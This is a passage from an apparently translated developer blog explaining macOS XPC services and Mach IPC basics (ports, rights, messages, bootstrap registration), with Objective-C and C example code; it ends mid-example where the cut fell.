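CFBundlePackageType: a string giving the bundle package type; for an XPC service it must be XPC!
XPCService: a dictionary
- EnvironmentVariables: a dictionary of environment variables set when the XPC service runs.
- JoinExistingSession: a boolean indicating whether the XPC service runs in the same security session as its caller.
- RunLoopType: a string selecting the service's run loop type; the default is dispatch_main, the alternative is NSRunLoop.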

3. A simple Client example

Now that the XPC service can run, we need a program that uses it. The default XPC Service template provides the following client code, which sends a string to the XPC service and prints the result it returns:

Create the XPC connection:

NSXPCConnection *_connectionToService = [[NSXPCConnection alloc] initWithServiceName:@"io.kiprey.github.XPCDemo"];
_connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCDemoProtocol)];
[_connectionToService resume];

Send a request:

[[_connectionToService remoteObjectProxy] upperCaseString:@"hello" withReply:^(NSString *aString) {
    // We have received a response. Update our text field, but do it on the main thread.
    NSLog(@"Result string was: %@", aString);
}];

Invalidate the connection once it is no longer needed:

[_connectionToService invalidate];

As the code shows:

The client uses the XPC service's Bundle ID to look up the service and establish a connection.
It then sets the remoteObjectInterface property to declare the interface it is going to call.
Next it resumes the connection and, through the remoteObjectProxy property of the NSXPCConnection object, calls the service's interface indirectly and transparently. When the XPC service finishes, the returned data is logged to the console asynchronously.
Finally, it closes the XPC connection.

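4. Starting the XPC Service & Client

How to actually run the XPC service and get a client to connect deserves a special note (this took me quite a while to figure out).

a. Local XPC Service

That is, embedding the XPC service in an App.

First, create an App:

Pitfall: it must not be a Command Line Tool.
A Command Line Tool has no App-like bundle structure, so it cannot host an XPC service.

Then, on the next screen, pick an Interface whose Language is Objective-C; the Interface option only concerns the GUI and can be ignored for now:

After the project is created, choose File -> New -> Target and add an XPC Service. Note the Embed in Application option in the last step of the wizard:

With it, the new XPC service is embedded into the Application:

Then, to keep things simple, we take the original code in main.m: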

#import <Cocoa/Cocoa.h>

int main(int argc, const char * argv[]) {
    
    @autoreleasepool {
        // Setup code that might create autoreleased objects goes here.
    }
    return NSApplicationMain(argc, argv);
}

and replace it with the following code that calls the XPC service, plain and simple:

#import "XPCServiceProtocol.h"

int main(int argc, const char * argv[]) {
    // Try connect to XPC Service
    NSXPCConnection* _connectionToService = [[NSXPCConnection alloc] initWithServiceName:@"io.github.kiprey.XPCService"];
    _connectionToService.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(XPCServiceProtocol)];
    [_connectionToService resume];
    
    // Try using XPC Service interface
    [[_connectionToService remoteObjectProxy] upperCaseString:@"hello" withReply:^(NSString *aString) {
        // We have received a response. Update our text field, but do it on the main thread.
        NSLog(@"Result string was: %@", aString);
    }];
    
    // Wait for XPC Service response
    NSLog(@"Sleep 5s...");
    sleep(5);
    
    [_connectionToService invalidate];
    
    NSLog(@"Bye.");
}

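Note that the request is executed asynchronously, so by the time the caller reaches the end of the program it may not yet have received the reply from the XPC service. The caller has to wait and must not call invalidate right away.

Calling invalidate terminates the connection immediately; it does not wait for the XPC service to reply first.

Build the XPCService first, then the Client. Here is the output: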

b. Global XPC Service

The approach above shows how to embed an XPC service in an App and use it; launching and managing it is fairly convenient.

But what if we want the XPC service to be callable by arbitrary programs? How do we start it then?

First write an XPCDemo.plist; a plist of this kind is called a launchd.plist. Its contents:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>Label</key>
  <string>io.kiprey.github.XPCDemo</string>
  <key>Program</key>
  <string>/Users/kiprey/Desktop/Mach_test/XPCDemo/Build/Products/Debug/XPCDemo.xpc/Contents/MacOS/XPCDemo</string>
  <key>KeepAlive</key>
  <true/>
  <key>POSIXSpawnType</key>
  <string>Interactive</string>
  <key>MachServices</key>
  <dict/>
</dict>
</plist>

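It specifies:

Label: the label other processes use to refer to this XPC service
Program: the path of the daemon to launch
KeepAlive: whether launchd should restart the daemon after it crashes
…

More details on launchd.plist can be found in man launchd.plist and are not repeated here.

After that we can let launchd start and manage our XPC service.

I originally wanted to copy XPCDemo.plist into /System/Library/LaunchDaemons, but cp failed with Read-only file system, i.e. the target folder does not allow writes. Neither disabling SIP nor running sudo mount -uw / to remount the root made the folder writable. I did not want to fiddle with other approaches, so I gave up on copying the plist into the System Launch Daemons folder.

The error is probably because the target path starts with /System.
We can still copy the plist into /Library/LaunchDaemons instead.

But even without copying the plist into a Launch Daemons folder, we can have launchd start our XPC service:

First, run chown to change the ownership of the XPCDemo.plist we just created:
sudo chown root:wheel XPCDemo.plist
Then run the following command to have launchd start the target program:
sudo launchctl bootstrap system XPCDemo.plist
When we want launchd to shut the XPC service down, run:
sudo launchctl bootout system XPCDemo.plist

Once launchd manages our global XPC service, if the service crashes, launchd restarts it every 10s:

The screenshot was taken during earlier testing, when XPCDemo kept dying right after launch, so launchd restarted it every 10s, over and over.
Command to view the log: log show --predicate 'processID == 0' --last 1h | grep "XPC"

Note that the binary built by a standalone Xcode XPC Service project cannot be executed directly and therefore cannot run under launchd; follow Signing a Daemon with a Restricted Entitlement to build the XPC service as an app-like bundle containing an executable.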

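5. NSXPC architecture

From the figure below we can see that what the [ServiceDelegate listener:shouldAcceptNewConnection:] method above does is set up the Exported Object on the NSXPC service side.

And this figure illustrates the whole XPC communication flow:

III. C-Style XPC Service

Once the Objective-C XPC service is understood, the C-style XPC service is easy to follow.

I will not go into the details; here are two references on C-style XPC:

IV. References

Getting Started with MacOSX Mach IPC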

2021-12-23T16:00:00.000Z

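I. Introduction

Mach is a communication-oriented operating system microkernel whose basic unit of work is the task (rather than the process). The Mach kernel provides an IPC mechanism, and most XNU services are built on top of Mach IPC and Mach tasks.

Mach has several basic abstractions, among them task, thread, port, message and memory object.

As a component of the macOS XNU kernel, the Mach microkernel takes over a significant share of functionality, the best known being the Mach IPC inter-process communication mechanism.

Here I briefly record some of the inner workings of Mach IPC.

Note that this is my first contact with Mach IPC, so some statements or explanations may be wrong; corrections are very welcome.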

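II. Mach Task & Thread

Mach splits the traditional UNIX process abstraction into task and thread:

A task is an execution environment and a static entity. It does not perform computation itself but provides a framework in which other entities (such as threads) execute. A BSD process in the kernel (similar to a Unix process) corresponds one-to-one to a Mach task.
A task is also the basic unit of resource allocation: the resources associated with a BSD process are contained in its task.
Each task also represents a protection boundary: a task cannot access resources in another task without first obtaining access rights.
A thread is the entity that actually executes in Mach, the point of control flow within a task. It runs in the context of its task.
The code a thread executes resides in the address space of its task. Each task contains zero or more threads.

From the description above, a task can loosely be thought of as a process in the traditional sense (very similar, isn't it :)).

Note that once a task is created, anyone holding the task identifier can modify the task.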

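III. Mach Port

1. Concept

A Mach port is a kernel-protected unidirectional IPC channel, a capability and a name. Inside the Mach kernel a port is implemented as a bounded message queue maintained by the kernel; somewhat like a Linux pipe, operations block when the queue is full or empty, and the basic operations are sending and receiving messages. The queue is multi-producer, single-consumer: there can only be a single receive right.

The port abstraction and its operations are the foundation of Mach communication. Each port has kernel-managed rights associated with it, and a task must hold the appropriate right to operate on a port. When a Mach message is sent to a port, only the task holding the receive right for that port can receive the message and remove it from the queue.

For example, rights can allow certain tasks to send messages to a given port, or designate the task that receives the messages sent to it.

Ports are very important in Mach: they act as object references and represent services, resources and other abstractions in the OS. Many data structures and services in the Mach kernel are represented by ports, and users access tasks, threads and memory objects through the corresponding ports.

A Mach port name is an integer, but unlike file descriptors, Mach ports are not implicitly inherited across fork.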
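The "bounded queue, many senders, one receiver" picture can be sketched as a toy model in plain C. Everything here is an assumption made for illustration: `toy_port`, `toy_send`, `toy_receive` and the limit of 4 are hypothetical, tasks are plain integers, and where a real sender or receiver would block, the toy simply returns -1.

```c
#include <stddef.h>

#define TOY_QLIMIT 4   /* hypothetical queue limit, not the kernel's value */

typedef struct {
    int    msgs[TOY_QLIMIT];  /* queued "messages" (plain ints here) */
    size_t head, count;
    int    receiver_task;     /* the single task holding the receive right */
} toy_port;

/* Any task with a send right may enqueue. Returns -1 when the queue is
   full, which is where a real sender would block or time out. */
int toy_send(toy_port *p, int msg) {
    if (p->count == TOY_QLIMIT) return -1;
    p->msgs[(p->head + p->count) % TOY_QLIMIT] = msg;
    p->count++;
    return 0;
}

/* Only the holder of the receive right may dequeue. Returns -1 when the
   caller is not the receiver or the queue is empty. */
int toy_receive(toy_port *p, int task, int *out) {
    if (task != p->receiver_task || p->count == 0) return -1;
    *out = p->msgs[p->head];
    p->head = (p->head + 1) % TOY_QLIMIT;
    p->count--;
    return 0;
}
```

Messages come out in the order they were queued, and a task other than `receiver_task` can never drain the queue, which mirrors the single receive right.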

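2. Port Right

Every Mach port has rights associated with it. Below are some of the port right types defined by Mac OSX:

MACH_PORT_RIGHT_SEND: the holder may send messages to the port.
MACH_PORT_RIGHT_RECEIVE: the holder may receive messages from the port.
MACH_PORT_RIGHT_SEND_ONCE: the holder may send exactly one message. A message is always delivered through this right, even if the right is destroyed unused.
MACH_PORT_RIGHT_PORT_SET: a set of port names, which can be viewed as a collection of receive rights. A port set can be used to listen on several ports at once, similar to Unix epoll.
MACH_PORT_RIGHT_DEAD_NAME: just a placeholder. When a port is destroyed, all existing rights to it turn into dead names (i.e. invalid rights). The dead name mechanism prevents the port name from being reused too early.

A port is considered destroyed when its receive right is released. Note that the receive right can be held by only one task at any time.

A port right name is the specific integer a task uses to refer to a port right it holds, somewhat like a file descriptor. Each port right name is only meaningful in the context of the task that owns it: merely passing the integer to another task does not let that task access the corresponding Mach port. (Again similar to file descriptors.)

This port right name is the mach_port_t value that we see most often in user space (note: specifically user space).
There is also the port name (not the same as a port right name), which in user space is a value of type mach_port_name_t.

The relation between port name and right resembles the relation between a Unix file descriptor and the access mode attached to it. Do not simply equate right with permission, though; a Mach port right differs considerably from what the word permission suggests.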
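Why a name only makes sense inside one task can be sketched with a toy per-task name table. The types and functions below (`toy_kport`, `toy_space`, `toy_copyout`, `toy_lookup`) are hypothetical and merely mimic the idea of a per-task IPC space; real names are not small consecutive indices.

```c
#include <stddef.h>

#define TOY_MAX_NAMES 8

typedef struct { int id; } toy_kport;     /* stand-in for a kernel port object */

typedef struct {
    toy_kport *entries[TOY_MAX_NAMES];    /* name -> port, private to one task */
} toy_space;

/* Install a right in a task's space and return the task-local name
   (slot index + 1 in this toy), or 0 when the table is full. */
unsigned toy_copyout(toy_space *s, toy_kport *port) {
    for (unsigned i = 0; i < TOY_MAX_NAMES; i++) {
        if (s->entries[i] == NULL) {
            s->entries[i] = port;
            return i + 1;
        }
    }
    return 0;
}

/* Resolve a name in the context of one particular task. */
toy_kport *toy_lookup(const toy_space *s, unsigned name) {
    if (name == 0 || name > TOY_MAX_NAMES) return NULL;
    return s->entries[name - 1];
}
```

The same integer resolves to different ports in different spaces, so handing the bare number to another task transfers nothing; the right itself has to be carried inside a Mach message.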

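IV. Mach Message

A Mach IPC message is the data object threads use to communicate with each other, and the typical means of communication between tasks. A message may contain the actual data (inline data) or pointers to out-of-line (OOL) data; the latter is an optimization for transferring large data.

A Mach message consists of the following parts:

A mandatory message header (of type mach_msg_header_t)

typedef struct
{
  mach_msg_bits_t     msgh_bits;           // message flag bits
  mach_msg_size_t     msgh_size;           // total size of header + body + data
  mach_port_t         msgh_remote_port;    // destination port right
  mach_port_t         msgh_local_port;     // auxiliary (reply) port right
  mach_port_name_t    msgh_voucher_port;
  mach_msg_id_t       msgh_id;             // not interpreted during delivery; free for the user to set
} mach_msg_header_t;

An optional message body (of type mach_msg_body_t)
typedef struct
{
  mach_msg_size_t msgh_descriptor_count;
} mach_msg_body_t;
Note that the message body is more than this one small struct; see the figures below.
The user data to be sent
An optional trailer (of type mach_msg_trailer_t). It only matters on the receiving side. We will come back to it below.

A simple message example, where header.size is the total size of header + data:

A complex message example. Unlike a simple message, a complex message also contains a body that carries additional descriptive information.

A more detailed diagram:

Here is a concrete code sample of a complex message. The body part consists of the msgBody and ports[1] fields, and the data to be sent is the notifyHeader field: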

struct PingMsg {
    mach_msg_header_t           msgHdr;
    mach_msg_body_t             msgBody;
    mach_msg_port_descriptor_t  ports[1];
    OSNotificationHeader64      notifyHeader __attribute__ ((packed));
};

How messages are used and how they work will be explained step by step in the sections below.
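As a rough check of the "header + data" layout of a simple message, the sketch below mirrors the header with fixed-width stand-ins. The `toy_` types are hypothetical, and the assumption that every header field is 32 bits wide matches current macOS to my knowledge but is not taken from the original post.

```c
#include <stddef.h>
#include <stdint.h>

/* Mirror of the six header fields, each assumed to be 32 bits wide. */
typedef struct {
    uint32_t msgh_bits;
    uint32_t msgh_size;
    uint32_t msgh_remote_port;
    uint32_t msgh_local_port;
    uint32_t msgh_voucher_port;
    int32_t  msgh_id;
} toy_msg_header;

/* A simple message: header immediately followed by inline user data. */
typedef struct {
    toy_msg_header header;
    char           texts[20];
    int32_t        integer;
} toy_simple_msg;

/* The value a sender would store in msgh_size for this message. */
size_t toy_simple_msg_size(void) { return sizeof(toy_simple_msg); }

/* Offset at which the inline data starts, i.e. the header size. */
size_t toy_payload_offset(void) { return offsetof(toy_simple_msg, texts); }
```

Under these assumptions the header occupies 24 bytes and the whole message 48 bytes, so msgh_size covers the header as well as the payload.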

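V. Getting Started with the Mach API

1. One-way Mach communication example

*. Code example

Below is a simple example of IPC using the low-level Mach API.

#include <stdio.h>
#include <string.h>
#include <assert.h>
#include <unistd.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>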

void sender() {
    // Look up the service in bootstrap and obtain a mach port
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("bootstrap_look_up() returned port right name %d\n", port);

    // Build the message to send (zero-initialised so unused header fields are defined)
    struct {
        mach_msg_header_t header;
        char texts[20];
        int integer;
    } message = {0};

    message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0);
    message.header.msgh_remote_port = port;
    message.header.msgh_local_port = MACH_PORT_NULL;
    message.header.msgh_size = sizeof(message);

    strcpy(message.texts, "kiprey_texts");
    message.integer = 123;

    // Send it
    mach_msg_return_t mr = mach_msg_send(&message.header);
    assert(mr == MACH_MSG_SUCCESS);
    printf("message is sent.\n");
}

void receiver() {
    // Create a mach port with a receive right
    mach_port_t port;
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    assert(kr == KERN_SUCCESS);
    printf("mach_port_allocate() created port right name %d\n", port);
    
    // Add a send right to this port
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    assert (kr == KERN_SUCCESS);
    printf("mach_port_insert_right() inserted a send right\n");

    // Hand the port's send right to bootstrap so that other processes can look it up
    kr = bootstrap_register(bootstrap_port, "io.github.kiprey", port);
    assert (kr == KERN_SUCCESS);
    printf("bootstrap_register()'ed our port\n");

    // Wait for a message
    struct {
        mach_msg_header_t header;
        char texts[20];
        int integer;
        mach_msg_trailer_t trailer;
    } message;

    message.header.msgh_size = sizeof(message);
    message.header.msgh_local_port = port;
    kr = mach_msg_receive(&message.header);
    assert (kr == KERN_SUCCESS);
    printf("Got a message\n");

    printf("Text: %s, number: %d\n", message.texts, message.integer);
}

int main(int argc, const char * argv[]) {
    if(fork() == 0) {
        // Wait until the receiver has registered its port before sending
        sleep(1);
        sender();
    }
    else {
        receiver();
    }
    return 0;
}

Test result:

Next, a brief look at some of the user-level APIs called in this example.

a. mach_port_allocate

At the start, the receiver calls mach_port_allocate to create a Mach port with the specified right:

mach_port_t port;
kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);

The function is declared as follows:

kern_return_t mach_port_allocate(ipc_space_t task, mach_port_right_t right, mach_port_name_t *name)

The first parameter specifies the task of the current process. Interestingly, the task is itself specified by passing a Mach port name. Below is the source of task_self_trap, which mach_task_self wraps.

/*
 *  Routine:    task_self_trap [mach trap]
 *  Purpose:
 *      Give the caller send rights for his own task port.
 *  Conditions:
 *      Nothing locked.
 *  Returns:
 *      MACH_PORT_NULL if there are any resource failures
 *      or other errors.
 */

mach_port_name_t
task_self_trap(
    __unused struct task_self_trap_args *args)
{
    task_t task = current_task();
    ipc_port_t sright;
    mach_port_name_t name;

    sright = retrieve_task_self_fast(task);
    name = ipc_port_copyout_send(sright, task->itk_space);
    return name;
}

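The second parameter specifies the right of the port to allocate; here a receive right is requested. According to the xnu source, only the following three values are valid for it:

MACH_PORT_RIGHT_RECEIVE: create a new port, for which the caller initially holds only the receive right
MACH_PORT_RIGHT_PORT_SET: create an empty port set with no members
MACH_PORT_RIGHT_DEAD_NAME: create a new dead name

The third parameter is where the name of the newly allocated port is stored on success; there is nothing more to say about it.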
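The rule for the second parameter can be written down as a small check. This is a sketch rather than the kernel's code: `toy_allocate_check` is a hypothetical helper, and the numeric constants are copied, to the best of my knowledge, from mach/port.h and mach/kern_return.h so that the snippet compiles without the Mach headers.

```c
/* Right types, mirroring MACH_PORT_RIGHT_* (assumed values). */
#define TOY_RIGHT_SEND       0
#define TOY_RIGHT_RECEIVE    1
#define TOY_RIGHT_SEND_ONCE  2
#define TOY_RIGHT_PORT_SET   3
#define TOY_RIGHT_DEAD_NAME  4

/* Return codes, mirroring KERN_SUCCESS and KERN_INVALID_VALUE (assumed values). */
#define TOY_KERN_SUCCESS        0
#define TOY_KERN_INVALID_VALUE  18

/* Accept only the three right types that an allocation may create. */
int toy_allocate_check(int right) {
    switch (right) {
    case TOY_RIGHT_RECEIVE:
    case TOY_RIGHT_PORT_SET:
    case TOY_RIGHT_DEAD_NAME:
        return TOY_KERN_SUCCESS;
    default:
        /* Send and send-once rights are derived from an existing port
           instead of being allocated directly. */
        return TOY_KERN_INVALID_VALUE;
    }
}
```

This is why the example first allocates a receive right and only afterwards derives a send right from it with mach_port_insert_right.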

b. mach_port_insert_right

Purpose: insert the specified port right into the target task (here, the current task).

How the example uses it:

// Add a send right to this port
kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);

Its declaration is:

kern_return_t
mach_port_insert_right(
    ipc_space_t task,
    mach_port_name_t name,
    mach_port_t poly,
    mach_msg_type_name_t polyPoly)

In this example the caller adds a send right to the newly created port (which so far only has a receive right). The send right here is the right to send Mach messages to this port.

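c. bootstrap_register/lookup

On OSX, a newly created task is given a set of special Mach ports, including:

Host port (itk_host): represents the machine the task runs on. It lets the task obtain information about the kernel and the host.
Task port (itk_sself): a send right to the port that refers to the task itself. This is what mach_task_self() returns, and the task uses it to operate on itself (for example to query task info).
Bootstrap port (itk_bootstrap): connects to the bootstrap server (launchd).

The rest can be found in osfmk\mach\task_special_ports.h.

The corresponding fields in the kernel's task structure are: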

/* IPC structures */
struct ipc_port *itk_self;  /* not a right, doesn't hold ref */
struct ipc_port *itk_nself; /* not a right, doesn't hold ref */
struct ipc_port *itk_sself; /* a send right */
struct exception_action exc_actions[EXC_TYPES_COUNT];
/* a send right each valid element  */
// host port
struct ipc_port *itk_host;  /* a send right */ 
// bootstrap port
struct ipc_port *itk_bootstrap; /* a send right */
// seatbelt port
struct ipc_port *itk_seatbelt;  /* a send right */
// gssd port
struct ipc_port *itk_gssd;  /* yet another send right */
// debug port
struct ipc_port *itk_debug_control; /* send right for debugmode communications */
// task_access port
struct ipc_port *itk_task_access; /* and another send right */ 
// resume port
struct ipc_port *itk_resume;    /* a receive right to resume this task */
// registered ports; they can be set with mach_ports_register
struct ipc_port *itk_registered[TASK_PORT_REGISTER_MAX];
/* all send rights */

struct ipc_space *itk_space;

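As we can see, these struct ipc_port *itk_* fields are all special Mach ports that are set up for every task.

Of these, itk_host, itk_bootstrap, itk_seatbelt, itk_gssd and itk_task_access are inherited from the parent task.

For the itk_registered array, a user can call mach_ports_register to register ports into it and mach_ports_lookup to query them. A registered port right fills one slot of the itk_registered array in the task structure.

The bootstrap server provides a port namespace in which a task can register its own ports, so that other tasks can look them up and send messages to them.

We can think of the bootstrap server as a phone book: a task publishes a well-known name that maps to the Mach port the task is listening on.

To register a service with the bootstrap server, a task can call bootstrap_register(), which takes a string name and the Mach port to associate with it. Note, however, that Mac OSX deprecated this function in 10.5, so compiling the example above produces a deprecation warning.

We can use bootstrap_check_in in place of bootstrap_register.

In this example the receiver registers a Mach port carrying a send right with bootstrap; when the sender asks bootstrap for the receiver's port, bootstrap hands the sender a copy of the send right of the registered port.

The sender now holds a send right to the port and can send data to it, and the other end of the port (the receiver) can read the messages the sender sent.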
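The phone-book behaviour can be sketched as a tiny name-to-port registry in plain C. This is a toy under stated assumptions: `toy_bootstrap`, `toy_register` and `toy_look_up` are hypothetical, ports are plain integers, and nothing here models how launchd actually copies send rights between tasks.

```c
#include <string.h>

#define TOY_MAX_SERVICES 8

typedef struct { const char *name; unsigned port; } toy_service;

typedef struct {
    toy_service slots[TOY_MAX_SERVICES];
    int used;
} toy_bootstrap;

/* Publish `port` under `name`. Fails (-1) if the name is already taken or
   the table is full. The name string must outlive the registry. */
int toy_register(toy_bootstrap *b, const char *name, unsigned port) {
    if (b->used == TOY_MAX_SERVICES) return -1;
    for (int i = 0; i < b->used; i++)
        if (strcmp(b->slots[i].name, name) == 0) return -1;
    b->slots[b->used].name = name;
    b->slots[b->used].port = port;
    b->used++;
    return 0;
}

/* Find the port published under `name`. Returns -1 if it is unknown. */
int toy_look_up(const toy_bootstrap *b, const char *name, unsigned *port) {
    for (int i = 0; i < b->used; i++) {
        if (strcmp(b->slots[i].name, name) == 0) {
            *port = b->slots[i].port;
            return 0;
        }
    }
    return -1;
}
```

In the example above the receiver plays the role of `toy_register` and the sender that of `toy_look_up`, which is also why the sender sleeps for a second first: looking up a name before it is registered fails.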

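d. mach_msg

Purpose: send or receive a Mach message. In this example both the sender and the receiver end up calling this function indirectly to send or receive a mach msg.

Let's first look at the definition of mach_msg to see what each parameter does; how the kernel handles it is covered later.

mach_msg_return_t
mach_msg(msg, option, send_size, rcv_size, rcv_name, timeout, notify)
    mach_msg_header_t *msg;    // pointer to the Mach message
    mach_msg_option_t option;  // basic flags, e.g. MACH_SEND_MSG or MACH_RCV_MSG to select sending or receiving
    mach_msg_size_t send_size; // length of the message to send
    mach_msg_size_t rcv_size;  // length of the receive buffer
    mach_port_t rcv_name;      // port to receive the message on
    mach_msg_timeout_t timeout;// maximum time mach_msg may wait
    mach_port_t notify;        // a notification port used to receive notifications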

mach_msg_return_t
mach_msg_send(mach_msg_header_t *msg)
{
    return mach_msg(msg, MACH_SEND_MSG,
            msg->msgh_size, 0, MACH_PORT_NULL,
            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}

mach_msg_return_t
mach_msg_receive(mach_msg_header_t *msg)
{
    return mach_msg(msg, MACH_RCV_MSG,
            0, msg->msgh_size, msg->msgh_local_port,
            MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);
}

On the sending side, the sender has to fill in several header fields:

message.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0); // dispositions of the ports set below
message.header.msgh_remote_port = port;          // the destination port to send to
message.header.msgh_local_port = MACH_PORT_NULL; // no auxiliary (reply) port
message.header.msgh_size = sizeof(message);

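2. Two-way Mach communication example

The example above showed the basics of one-way Mach communication (sender -> receiver). Next we let the receiver send data back to the sender to get two-way communication.

Since a Mach port is unidirectional, the sender must create a new port (the sender owns this new port, while the receiver already owns the old one), and the receiver must obtain a send right to it. This raises a question: how do we transfer a Mach port right?

One option is to go through bootstrap again. That works but is not elegant. Since the sender can already send messages to the receiver through the existing port, it can use that port to pass the send right of the new port to the receiver.

This works because Mach messages support transferring port rights.

Here is the complete flow, where bob is the sender and alice is the receiver:

The question now is how to send the right across. Let's look at two different ways.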

a. reply port

1) sender

Once the sender has obtained a send right to the receiver's port from bootstrap, it can send messages to the receiver. This is how the message header was set up before:

message.header.msgh_bits = MACH_MSGH_BITS(/* remote */ MACH_MSG_TYPE_COPY_SEND, /* local */0);
message.header.msgh_remote_port = port;
message.header.msgh_local_port = MACH_PORT_NULL;

Here we set up the message differently:

In msgh_bits, additionally set the disposition of the local port to MACH_MSG_TYPE_MAKE_SEND_ONCE, so that the peer can send to this port only once.
In msgh_local_port, put the replyPort that we created locally.

message.header.msgh_bits = MACH_MSGH_BITS_SET(
    /* remote */ MACH_MSG_TYPE_COPY_SEND,
    /* local */ MACH_MSG_TYPE_MAKE_SEND_ONCE,
    /* voucher */ 0,
    /* other */ 0);
// Note: the statement above is equivalent to
// message.header.msgh_bits = MACH_MSGH_BITS(/* remote */ MACH_MSG_TYPE_COPY_SEND, /* local */ MACH_MSG_TYPE_MAKE_SEND_ONCE);

message.header.msgh_remote_port = port;

// Unlike the one-way case, which used MACH_PORT_NULL, this is a mach port the sender created itself
message.header.msgh_local_port = replyPort;

If we now send this message with mach_msg, the message from the sender carries a replyPort.

What is the replyPort for? The receiver on the other side uses it to send a message back to the sender.

Note the message.header.msgh_bits we set: its local part is MACH_MSG_TYPE_MAKE_SEND_ONCE, which means the receiver can perform only one send on replyPort.
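How the two dispositions share one msgh_bits word can be sketched without the Mach headers. The `toy_` names are hypothetical; the numeric values and masks are copied, to the best of my knowledge, from mach/message.h, where the remote disposition sits in the low bits and the local one is shifted left by 8.

```c
#include <stdint.h>

/* Dispositions, mirroring MACH_MSG_TYPE_* (assumed values). */
#define TOY_MSG_TYPE_COPY_SEND       19u
#define TOY_MSG_TYPE_MAKE_SEND_ONCE  21u

/* Masks, mirroring MACH_MSGH_BITS_REMOTE_MASK / MACH_MSGH_BITS_LOCAL_MASK. */
#define TOY_MSGH_BITS_REMOTE_MASK 0x0000001fu
#define TOY_MSGH_BITS_LOCAL_MASK  0x00001f00u

/* Same packing as MACH_MSGH_BITS(remote, local). */
uint32_t toy_msgh_bits(uint32_t remote, uint32_t local) {
    return remote | (local << 8);
}

/* Disposition applied to msgh_remote_port (the destination). */
uint32_t toy_bits_remote(uint32_t bits) {
    return bits & TOY_MSGH_BITS_REMOTE_MASK;
}

/* Disposition applied to msgh_local_port (the reply port). */
uint32_t toy_bits_local(uint32_t bits) {
    return (bits & TOY_MSGH_BITS_LOCAL_MASK) >> 8;
}
```

With these values, packing COPY_SEND for the destination and MAKE_SEND_ONCE for the reply port gives 0x1513, and each half can be recovered independently with the two accessors.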

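2) receiver

When the receiver gets the message, the remote_port and local_port the sender set map, respectively, to local_port and remote_port in the message the receiver sees.

So the remote_port in the receiver's message is not MACH_PORT_NULL but the replyPort set earlier.

The receiver can therefore send a message to the sender through this replyPort. Note that when sending to replyPort, the remote disposition in message.header.msgh_bits must be a send-once disposition matching the right that was transferred. Since the receiver holds only a send-once right to replyPort (not its receive right), this should be MACH_MSG_TYPE_MOVE_SEND_ONCE rather than MACH_MSG_TYPE_MAKE_SEND_ONCE.

Because of what the sender of the replyPort set up, the receiver can send only one message to replyPort.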
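The swap of the two port fields and the addressing of the reply can be sketched as follows. This is a toy with hypothetical names (`toy_ports`, `toy_as_received`, `toy_reply_to`); it keeps a single shared numbering for ports, whereas the real kernel also translates each right into a name in the receiver's own namespace. The value 18 for the move-send-once disposition is, to my knowledge, the one in mach/message.h.

```c
#include <stdint.h>

#define TOY_PORT_NULL               0u
#define TOY_MSG_TYPE_MOVE_SEND_ONCE 18u   /* assumed value */

typedef struct {
    uint32_t remote_port;   /* where this message is going */
    uint32_t local_port;    /* where a reply should go */
} toy_ports;

/* What the receiver sees: the two fields trade places on delivery. */
toy_ports toy_as_received(toy_ports sent) {
    toy_ports r = { sent.local_port, sent.remote_port };
    return r;
}

/* Address a reply: send to the port found in remote_port, with no
   further reply port of our own. */
toy_ports toy_reply_to(toy_ports received) {
    toy_ports r = { received.remote_port, TOY_PORT_NULL };
    return r;
}

/* Disposition the replier would use for its send-once right. */
uint32_t toy_reply_disposition(void) {
    return TOY_MSG_TYPE_MOVE_SEND_ONCE;
}
```

Moving the send-once right out with the reply consumes it, which is exactly why a second reply on the same replyPort is not possible.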

3) Code example

The complete implementation:

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <assert.h>
#include <mach/mach.h>
#include <servers/bootstrap.h>

struct mach_msg_send_t {
    mach_msg_header_t header;
    char texts[0x20];
    int integer;
};

struct mach_msg_receive_t {
    struct mach_msg_send_t recv_content;
    mach_msg_trailer_t trailer;
};

void sender()
{
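    // Give the receiver a moment to register with bootstrap (a crude delay, not real synchronization)
    usleep(1000);
    // Look up the receiver's Mach port through bootstrap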
    mach_port_t port;
    kern_return_t kr = bootstrap_look_up(bootstrap_port, "io.github.kiprey", &port);
    assert(kr == KERN_SUCCESS);
    printf("[sender] bootstrap_look_up() returned port right name %d\n", port);

    // Build the message to send
    struct mach_msg_send_t send_msg;
    strcpy(send_msg.texts, "Hello, I'm sender.");
    send_msg.integer = 1;

    // Create a new replyPort for the receiver to reply to
    mach_port_t replyPort;
    kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &replyPort);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_allocate() created port right name %d\n", replyPort);

    // Add a send right to the port as well
    kr = mach_port_insert_right(mach_task_self(), replyPort, replyPort, MACH_MSG_TYPE_MAKE_SEND);
    assert(kr == KERN_SUCCESS);
    printf("[sender] mach_port_insert_right() inserted a send right\n");

    // Note: the disposition of the local (reply) port is MACH_MSG_TYPE_MAKE_SEND_ONCE
    send_msg.header.msgh_bits           = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE);
    send_msg.header.msgh_remote_port    = port;
    send_msg.header.msgh_local_port     = replyPort;
    send_msg.header.msgh_size           = sizeof(send_msg);

    // Send it
    mach_msg_return_t mr = mach_msg_send(&send_msg.header);
    assert(mr == KERN_SUCCESS);
    printf("[sender] Message is sent.\n");

    // Wait for the reply
    struct mach_msg_receive_t recv_msg;
